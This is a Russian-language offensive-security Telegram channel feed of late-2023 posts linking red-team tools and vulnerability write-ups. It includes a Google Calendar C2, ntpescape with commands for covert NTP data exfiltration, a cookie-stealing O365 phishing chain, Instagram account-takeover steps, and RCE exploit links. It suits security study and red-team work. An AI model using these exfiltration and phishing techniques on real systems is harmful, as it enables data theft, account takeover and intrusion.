Cybred
9.78K subscribers
402 photos
35 videos
100 files
611 links
Download Telegram
https://github.com/MrSaighnal/GCR-Google-Calendar-RAT

Google Calendar RAT — это PoC Command&Control (C2) поверх событий Google Календаря.

Пригодится, когда сложно развернуть полноценную инфраструктуру Red Team.

Для использования GRC требуется только учетная запись Gmail. Скрипт создает «скрытый канал», используя события в Google Календаре и общаясь с целью с помощью их описания.

Недавно его использование уже было замечено в «дикой среде» https://thehackernews.com/2023/11/google-warns-of-hackers-absing-calendar.html
https://github.com/evallen/ntpescape

ntpescape — это инструмент, позволяющий скрытно осуществлять эксфильтрацию данных с компьютера, использующего протокол сетевого времени (NTP).

Он содержит множество функций, которые делают процесс эксфильтрации очень сложным для обнаружения:
— все сообщения встраиваются в пакеты легитимного NTP-клиента и не содержат никакой дополнительной информации

все передаваемые данные шифруются с помощью секретного ключа, поэтому антивирусы не смогут обнаружить передачу данных, поскольку они будут выглядеть статистически случайными

сервер-получатель отвечает на все отправленные клиентом пакеты так, как если бы он был настоящим NTP-сервером, отвечая реалистичными временными метками

получатель даже имитирует собственные обновления, случайным образом выбирая Stratum-1 NTP-сервер, с которого он периодически делает вид, что "обновляется"

все используемые данные слегка рандомизируются, чтобы имитировать реальные серверы и затруднить обнаружение пакетов с помощью IDS

Клонировать и собрать:
git clone git@github.com:evallen/ntpescape.git
make build


Запустить ресивер:
sudo ./recv


Отправить на него данные:
echo "hello, world" | ./send -d <put_server_here>:123 -tm 0 -tM 0
Собирать, структурировать и визуализировать данные удобно с помощью Maltego. Но в бесплатной версии ты быстро спотыкаешься об ограничения, а платная явно не окупает кровных исследователя.

Поэтому пришлось вспоминать о бесплатных альтернативах. Главными критериями были — возможность написания модулей (главное, чтобы это было просто и понятно) и схожесть с Maltego в построении графов с преобразованиями.

Вот несколько инструментов:

LinkScope - копия Maltego, но бесплатная и более стабильная. Нет жесткий ограничений, как в Maltego Community (клиент вообще с открытым исходным кодом), но есть платная версия с "Installation Assistance", "Custom Compiled Binaries", "Premium Resolutions", "Commercial use" за $575, которая явно нам не понадобится.

SpiderFoot — имеет веб-интерфейс (но можно пользоваться и из командной строки), более 200 модулей "из коробки" и интеграцию с TOR для поиска по Dark Web. Лидер по количеству встроенных инструментов, имеет платную версию с 2FA, поддержкой и Attack Surface мониторингом.

OSINTBuddy — попытка осовременить Maltego и немного изменить подход к визуализации. Плагинов немного, но пишутся они максимально просто (проще, чем для всех остальных упомянутых программ) и их можно выполнять step-by-step прямо из веб-консоли. Большая часть OSINTBuddy разработана в одиночку, имеет свой не активный форум. Полностью бесплатный.
The Triforce of Initial Access

В то время как редтимеры любят обсуждать и почти поэтично описывать свои наборы C2-фреймворков, возможности уклонения от EDR и быстрое использование эксплойтов N-day в качестве оружия, то, что редко упоминается, — это старые добрые способы получения первоначального доступа.

Подготовка к операции всегда будет выступать решающим фактором в том, нажмет ли кто-то на вашу ссылку, с радостью выполнит инструкции, которые вы придумаете или поделится секретом от TOTP.

Поэтому сначала я предпочитаю использовать фишинг учетных записей Microsoft Office 365, чтобы получить доступ к Teams, Outlook, OneDrive, OneNote и SharePoint.

Из них можно получить достаточно информации, чтобы начать развивать более грамотную атаку.

Что можно найти:
Пароли в открытом виде в Outlook или OneNote или Teams
Паспорта, водительские удостоверения, свидетельства о браке и другие документы в OneDrive

1 Этап — использование evilginx с готовыми фишлетами для o365. После получения ESTSAUTHPERSISTENT- и ESTSAUTH-кук, вы можете вставить их в свой собственный браузер и эффективно пройти аутентификацию без необходимости вводить пароль пользователя или иметь дело с MFA. Это обычно называется перехватом сеанса и является более или менее стандартом де-факто в современном фишинге.

2 Этап — Rogue Office 365 and Azure (active) Directory tools или ROADtools. Эту библиотеку можно использовать как только вы получите первоначальный доступ к Entra ID-клиенту. От манипуляции с токенами, PRT Injection и регистрации устройств до возможности аутентификации практически из любого контекста: пароли, сертификаты, файлы cookie, билеты Kerberos, Access-токены, PRT и многое другое возможно с помощью RoadTX.

3 Этап — TeamFiltration. Инструмент, который позволяет автоматически извлекать данные из Microsoft Office, включая электронные письма, вложения электронной почты, чаты Teams с вложениями, файлы из OneDrive из SharePoint, а также сведения о пользователях, группах и клиентах из Entra ID.

У него существует несколько Invoke-альтернатив для постэксплуатации: AADInternals, AzureHound и GraphRunner.

Все эти этапы объединяет скрипт под названием Bobber. Он ожидает получения кук, а дальше сам вызывает все остальные инструменты по цепочке. Его можно также найти на Github https://github.com/Flangvik/Bobber.
https://haxx.in/posts/hacking-canon-imageclass/

Очередное (в этом году) переполнение буфера, на этот раз в принтерах CANON.

Автор позаботился и оставил ссылку на свой тулкит https://github.com/blasty/canon/
https://github.com/projectdiscovery/nuclei-ai-extension

Template-генератор для Nuclei с AI, чтобы самому не писать YAML. Описываете эксплуатацию или копируете готовую из твиттер и получаете готовый шаблон.

Ещё он умеет генерить репорты по кнопке на H1 и его работу можно совместить с PentestGPT https://github.com/GreyDGL/PentestGPT, который ищет баги сам.
https://github.com/0x90n/InfoSec-Black-Friday/

Скидки в честь черной пятницы на подписочные сервисы, курсы и экзамены по инфосеку.

GrayhatWarfare Open Bucket & shorturl Secrets
40% off Premium ($160 down from $300) & Enterprise ($450 down from $960)
https://grayhatwarfare.com/packages

Offensive Security - Penetration Testing Training
20% off Learn One subscription
https://www.offensive-security.com/learn-one

SafeStack - Secure Development Training Platform
25% off plans with code: BFTHANKS2023
https://safestack.io/

Zero Point Security Certifications & Courses
20% off with code: BLACKFRI23
https://training.zeropointsecurity.co.uk

The Cyber Plumber's Lab Guide and Access
(1) 33% off ($13.37 USD) + free handbook: BLACKFRIDAY2023
https://opsdisk.gumroad.com/l/cphlab/blackfriday2023

DroneSec (Drone Cybersec, Threat Intel & Counter-Drone Security Training)
20% off with code: GIVETHANKS23
https://training.dronesec.com/p/bundle

TCM Security Certification & Courses
(1) 20% off of certifications and live trainings: GobbleGobble23
(2) 50% off of the first payment of the All-Access Membership (any plan)
https://tcm-sec.com/

Pensterlab
27% off one year subscription, applied automatically
(1) US$146 instead of US$199
(2) US$25.99 instead of US$34.99 for students
https://pentesterlab.com/pro

Mr. Un1k0d3r's Malware Development and Red Team Training Bundle
25% off both the coding class and red team training courses
https://mr.un1k0d3r.world/portal/index.php

The OSINTion Academy
80% off all on-demand courses
40% off upcoming live courses with code: BLACKFRIDAY
https://academy.theosintion.com/courses?affcode=989966_6g0qf83e

Cloud Academy (Security Courses)
41% off annual plan
https://cloudacademy.com/pricing

TryHackme Advent of Cyber Deal
20% off personal annual subscriptions with code: AOC2023
https://tryhackme.com/room/adventofcyber2023
https://www.unciphered.com/randstorm

Помните историю сотрудника Ripple, который забыл пароль от флешки с биткоинами на сумму $240M? Стартап в области кибербезопасности Unciphered во время поиска способа взломать его, нашел способ восстановить ключи от многих критовалютных кошельков, созданных до 2014 года.

Эксплойт под названием Randstorm основан на функции SecureRandom() в JavaScript-библиотеке JSBN, которая в сочетании с криптографическими слабостями в функции Math.random(), существовавшими на тот момент, позволяла использовать слабые псевдослучайные числа.

Эту библиотеку активно использовала другая библиотекаBitcoinJS, с помощью которой многие криптовалютные проекты генерировали кошельки для своих клиентов. Ее использовали Blockchain.com, Block.io Dogechain.info, Bitpay и другие сервисы.

В результате, недостаток энтропии можно использовать для проведения брутфорс-атак и восстановления приватных ключей кошельков, сгенерированных с помощью библиотеки BitcoinJS (или зависимых от неё проектов).

Чтобы реализовать атаку, понадобится что-то, что было сгенерировано с Math.random() во время создания кошелька — это может быть GUID-идентификатор или IV. Из GUID или IV мы сможем восстановить состояние RNG.

В большинстве случаев это позволит нам создавать все предыдущие и будущие значения, генерируемые RNG. Сюда входит начальный пул энтропии, который является основой для генерации закрытого ключа.

Недостаток безопасности изначально заложен в уязвимые кошельки, созданные с помощью BitcoinJS, и устранить его невозможно.

Ранее я писал про Read Protection Downgrade атаки, которые позволяют сдампить память и восстановить пин от холодных (Trezor, Ledger) кошельков. Про них можно прочитать тут.
This media is not supported in your browser
VIEW IN TELEGRAM
https://convergetp.com/2023/11/16/crushftp-zero-day-cve-2023-43177-discovered/

CVE-2023-43177 Unauthenticated Remote Code Execution

With approximately 10,000 public instances and many more behind corporate firewalls, the vulnerability attack surface is broad. The exploit permits an unauthenticated attacker to access all CrushFTP files, run arbitrary programs on the host server, and acquire plain-text passwords.
https://blog.gbrls.space/blog/building-a-free-burp-collaborator-with-cloudflare-workers

Гайд по созданию своего бесплатного Burp Collaborator на базе Cloudflare Workers с уведомлениями в Discord (которые можно переписать на сообщения в Telegram с Bot API).
Chrome V8 Hole Exploit

🇰🇷 Research
🐞 Exploit
https://link.medium.com/AON33lI0LEb

В Instagram находили баг, с которым можно было увести аккаунт любого пользователя. Для этого нужно было начать процедуру восстановления аккаунта цели, в процессе которой отправлялся код на номер телефона. Его можно было перебрать, а рейт лимит обойти, ротируя прокси между запросами.

У статьи вышло продолжение, но от другого ресерчера. Теперь атака выглядит так:
1. Регистрируемся в Instagram с номером цели
2. Instagram отправляет код на номер телефона
3. Брутфорсим его и регистрируем новый аккаунт на чужой номер
Как можно заметить, Meta забыла проверить другие эндпоинты на уязвимость, которую в прошлый раз они оценили в $30 000.

Переходим ко второй части:
4. Заходим в Facebook, переходим в Account Center и линкуем созданный аккаунт
5. Магия бэкенда добавляет связку IP злоумышленника <-> номер телефона цели в доверенные, в интерфейсе появляется номер жертвы
6. Заходим под чужим аккаунтом с раскрытым номером, 2FA не требуется из-за доверенного IP.

Сумма выплаты — $25 300.
https://github.com/ForceFledgling/proxyhub

ProxyHub is an open source tool that asynchronously finds public proxies from multiple sources and concurrently checks them.

Finds more than 7000 working proxies from ~50 sources.
Support protocols: HTTP(S), SOCKS4/5. Also CONNECT method to ports 80 and 23 (SMTP).
Proxies may be filtered by type, anonymity level, response time, country and status in DNSBL.
Work as a proxy server that distributes incoming requests to external proxies. With automatic proxy rotation.
All proxies are checked to support Cookies and Referer (and POST requests if required).
Automatically removes duplicate proxies.
Is asynchronous.

Дополнение к прошлому посту. Кроме этого, можно использовать AWS API Gateway с расширением API Rotate.
https://blog.hrncirik.net/cve-2023-46214-analysis

CVE-2023-46214 is a Remote Code Execution (RCE) vulnerability found in Splunk Enterprise. The description of the vulnerability essentially states that Splunk Enterprise versions below 9.0.7 and 9.1.2 are not safely sanitizing user supplied extensible stylesheet language transformations (XSLT).


Exploit https://github.com/nathan31337/Splunk-RCE-poc
https://eaton-works.com/2023/06/06/honda-ecommerce-hack/

Типичный код любого автомобильного бренда
resetPassword(e, t) {
return this.__post("api/user/resetpassword", {
username: e,
NewPassword: t
})
}


На этот раз статья о Honda, у которой даже есть своя Bug Bounty программа:
If a researcher believes that they have discovered a vulnerability with our systems, they are invited to contact our customer service office to document their observations at 1-800-999-1009.


Дозвонились из своей деревни, надиктовали репорт и отправили скриншоты по MMS?
I compromised Honda’s power equipment / marine / lawn & garden dealer eCommerce platform by exploiting a password reset API that let me easily reset the password of any account.

Full admin-level access achieved with access to: 21,393 customer orders across all dealers from August 2016 to March 2023 – this includes customer name, address, phone number, and items ordered.


В конце вам будет ожидать достойный ответ
I asked about the possibility of a vehicle or cash reward given the severity of the issue, but Honda does not currently have a bug bounty or mechanism to provide a reward. As a result, no reward was given for this report.


Поэтому не стоит удивляться, когда вы в очередной раз узнаете из новостей, что снова взломали и слили каких-то автомобилистов https://www.reuters.com/business/autos-transportation/toyota-suspends-all-domestic-factory-operations-after-suspected-cyber-attack-2022-02-28/
Chromium Money Tree Browser

It's very very hacked together, don't expect good UX or accurate data


Сколько Google платит за нахождение уязвимостей в браузере. Статистика с разбиением по файлам — вознаграждение делится между теми, где были внесены изменения. Например, если исправление ошибки стоимостью $1000 изменило 5 файлов, то каждый получит $200.

Вот немного из того, что было найдено в расширениях:
— [$15 000] heap-buffer-overflow in MoveWebContentsAtImpl (extension)
— [$7 000] Security: chrome.downloads.download could be abused to steal user's environment variables like secrets, tokens or keys on windows
— [$5 000] Security: Extensions with debugger permission can list URLs and send commands to incognito tabs and other profile tabs
— [$5 000] Security: Extension permission escalation
— [$5 000] Reading local files through an extension that only has the "downloads" permission

Данные приведены по состоянию на начало ноября 2023 года
Advent of Cyber 2023

Традиционно получаем премиум, как и в прошлые годы. Или что-нибудь лучше (за первые места Steam Deck и периферия).
https://github.com/Xacone/BestEdrOfTheMarket

The Best EDR Of The Market (BEOTM) наивный EDR (Endpoint Detection and Response) с открытым исходным кодом, созданный как испытательный стенд для понимания и обхода методов обнаружения, используемых во многих реальных EDR.

Работает в пользовательском пространстве и использует методы, которые основаны на динамическом анализе состояния целевого процесса (памяти, вызовов API и т. д.),

Используемые техники:
Multi-Levels API Hooking
SSN Hooking/Crushing
IAT Hooking
Shellcode Injection Detection
Reflective Module Loading Detection
Call Stack Monitoring

Находятся в разработке:
Heap Monitoring
ROP Mitigation
AMSI Patching Mitigation
ETW Patching Mitigation

Статьи из блога автора, рассказывающая о работе BEOTM более подробно — https://xacone.github.io/BestEdrOfTheMarket.html